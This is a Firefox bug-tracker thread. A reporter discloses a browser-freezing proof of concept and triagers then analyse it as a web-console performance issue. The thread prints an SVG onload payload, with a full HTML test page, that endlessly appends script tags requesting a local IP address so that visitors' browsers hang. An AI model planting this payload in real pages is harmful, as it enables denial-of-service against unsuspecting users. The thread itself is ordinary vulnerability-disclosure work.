User Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.101 Safari/537.36

Steps to reproduce:

Hey team,

I am Aman Rawat and I have found a issue that can slow down the users firefox who visit my site and their firefox will be freeze.

Steps to reproduce:-

1. Create a HTML file that contain a java script code

<svg/onload=setInterval(function(){with(document)body.appendChild(createElement("script")).src="//192.168.0.105:80"},0);>

2. Now visit that page

Expected results:

Now when user will visit my page this code will make lots of request to my IP and firefox browser will not able to handle those requests and their browser will be freeze

POC video :

https://vimeo.com/351771238/6ca65dd2e5

password : firefox

Hello,
I have tried to reproduce this issue on all versions of Firefox : release 68.0.2, beta 69 or Nightly 71.0a1 (2019-09-03), but unfortunately the HTML file redirected me to a warning about the site being deceptive.
Can you please re-test it while in Safe Mode ? You can find helpful info here : https://support.mozilla.org/en-US/kb/troubleshoot-firefox-issues-using-safe-mode .
Also can you re-test while using a new profile? You can find more about creating a new profile here : https://support.mozilla.org/en-US/kb/troubleshoot-and-diagnose-firefox-problems#w_6-create-a-new-firefox-profile .
If possible, you can test this issue on the nightly build as well. Download the build from : https://www.mozilla.org/en-US/firefox/nightly/all/ .

I already provided code of that html file so in order to reproduce that issue you should create a HTML file that contain that code and replace my IP with yours.

Hello again,
I have retested the issue with my ip instead of yours and it's the same result. I still get warned trying to reach the respective site and neither Firefox nor Chrome allows me to go further.
My steps were to save the line of code provided by you in a Notepad ++ as an html file and try to open it. It redirects me to its path.
If i am not doing something correctly please feel free to explain it step by step how it should be done.
Please see the attached file for more info.

<!DOCTYPE html>
<html>
<head>
<title>Let's crash it</title>
</head>
<body>
<svg/onload=setInterval(function(){with(document)body.appendChild(createElement("script")).src="http://192.168.0.105:80"},0);>
</body>
</html>

Copy this code and create a html file and open it in firefox

Did you reproduce this bug? Please let me know and if my report will be accepted please give me firefox swag if you provide swag.

Test case: https://substantial-fenugreek.glitch.me
Profile: https://perfht.ml/2LGS44G

It seems like a good portion of the time (around half) in the parent process is spent flushing layout from the scrollHeight getter here.

My report will eligible for firefox swags?

When opening this with Network panel and then switching to Console, I also see bug 1558351 adding overhead for processing the requests.

This bug is occurring because when we ran that code. Tons of request has been sent to a particular IP address and firefox browser can't able to handle those requests and browser will slow down of sometimes it cash the browsers.

Check this video :
https://vimeo.com/351771238/6ca65dd2e5

password : firefox

Can anyone please tell me that my submission is eligible for bounty or not ????

I'm not sure the original report was about the console?

Can anyone please tell me that my submission is eligible for bounty or not ????

I don't know about bounties, so I can't tell.
But if you want Firefox swag try to attend a local meetup

Ohk but what do you mean by local meetup ? I am from India

(In reply to Aman Rawat from comment #13)

Ohk but what do you mean by local meetup ? I am from India

You can try to see if you can find a local event here: https://www.mozilla.org/contribute/events/. Please let's keep the discussion on this bug focused on the performance issue in the web console, this is not the right forum for discussion about Mozilla community events. Thanks! :-)

is this issue fixed or any other update like can you assign cve

If you can fix this issue and assigned me a CVE then please go ahead